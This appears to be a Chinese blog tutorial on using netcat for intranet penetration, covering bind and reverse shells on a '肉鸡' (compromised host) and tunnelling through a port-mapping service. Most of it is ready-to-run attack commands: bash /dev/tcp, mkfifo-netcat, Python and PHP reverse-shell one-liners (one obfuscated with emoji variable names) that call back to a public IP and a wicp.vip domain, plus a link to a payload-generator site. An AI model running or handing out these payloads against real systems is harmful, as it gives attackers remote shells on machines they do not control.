• 内网穿透(nc)


    内网穿透技术(nc)

    Netcat常称为 nc,拥有“瑞士军刀”的美誉。

    nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,
    能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具
    ,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能,
    它基于socket协议工作。在渗透测试领域,我们通常利用它来反弹shell

    聊天

    通过一边监听端口,一边发送消息去该端口,形成一个简易版本的服务端—客户端模型。

    • 服务器端:
    nc   -lvp    8888       
    
    • 1

    监听8888端口 -l 监听 -v 显示详细信息 -p 指定端口

    • 客户端:
    nc  -nv  192.168.100.140  8888    
    
    • 1

    连接到服务器的8888端口 -n指定数字的IP地址 -v显示详细信息

    在这里插入图片描述

    文件传输

    • 服务器端:
    nc  -lvp  8888 < test.txt
    
    • 1

    监听8888端口 -l 监听 -v 显示详细信息 -p 指定端口

    • 客户端:
     nc -nvz 192.168.100.140 8888 > 1.txt  
    
    • 1

    连接到服务器的8888端口 -n指定数字的IP地址 -v显示详细信息 -z 将输入输出关掉

    在这里插入图片描述

    正向连接

    肉鸡

    nc -lvvp 8888 -te cmd.exe
    
    • 1
    nc -lvvp 8888 -te /bin/bash
    
    • 1

    肉鸡监听8888端口 -l 监听 -vv 显示更详细信息 -p 指定端口 -t 使用交互方式 -e 程序重定向,一旦连接,就执行

    主机

    nc  -nvv  192.168.10.14  8888
    
    • 1

    主机连接到肉鸡的8888端口 -n指定数字的IP地址 -vv显示更详细信息

    在这里插入图片描述

    在这里插入图片描述

    反向连接

    当肉鸡处于内网当中,需要主机有一个公网ip,然后让肉鸡主动连接主机,就算肉鸡是公网ip,但一般都是有防火墙拦截,所以反向连接是很好的选择

    肉鸡

     nc  -te /bin/bah 19.16.10.14  8888
    
    • 1

    主机

    nc  -lvp  8888
    
    • 1

    端口映射(花生壳,natapp)

    这里就仅使用花生壳做例子…

    建立一个tcp的映射

    在这里插入图片描述

    实验环境

    肉鸡: 192.168.100.133

    本地主机: n4221p5430.wicp.vip(103.46.128.49):25741 -> 127.0.0.1:5555

    本地主机中执行:

     nc  -lvp  5555
    
    • 1

    肉鸡中执行:

    各种payload生成网站

    https://s.xiaoxiaoran.top/
    
    • 1
     echo 'bash -i >& /dev/tcp/103.46.128.49/25741 0>&1' | bash
    
    • 1
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 103.46.128.49 25741 >/tmp/f
    
    • 1
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc  n4221p5430.wicp.vip 25741 >/tmp/f
    
    • 1
    php -r '$😀="1";$😁="2";$😅="3";$😆="4";$😉="5";$😊="6";$😎="7";$😍="8";$😚="9";$🙂="0";$🤢=" ";$🤓="<";$🤠=">";$😱="-";$😵="&";$🤩="i";$🤔=".";$🤨="/";$🥰="a";$😐="b";$😶="i";$🙄="h";$😂="c";$🤣="d";$😃="e";$😄="f";$😋="k";$😘="n";$😗="o";$😙="p";$🤗="s";$😑="x";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = "103.46.128.49";$💻 = 25741;$🐚 = "sh". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $😁. $🤠. $😵. $😅;$🤣 =  $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($🐚);'
    
    • 1
    php -r '$sock=fsockopen("103.46.128.49",25741);exec("sh <&3 >&3 2>&3");'
    
    • 1
    php -r '$sock=fsockopen("103.46.128.49",25741);passthru("sh <&3 >&3 2>&3");'
    
    • 1
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("n4221p5430.wicp.vip",25741));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
    
    • 1

  • 相关阅读:
    自己实现 SpringMVC 底层机制 系列之-实现任务阶段 4- 完成自定义@Service 注解功能
    destoon根据查询标题小于5个字符的数据进行删除
    Jetson Nano 部署(3):TensorRT介绍
    多因素(MFA)是防止数据泄露的最佳安全实践方法
    《统计学习方法》第二十章 马尔可夫链蒙特卡罗法
    1230天,百度再见!!!
    前端JS学习(一)
    java-php-python-ssm玉米生产力管理与分析平台计算机毕业设计
    2.13 集成学习
    【读点论文】CMT: Convolutional Neural Networks Meet Vision Transformers
  • 原文地址:https://blog.csdn.net/qq_52549196/article/details/125509276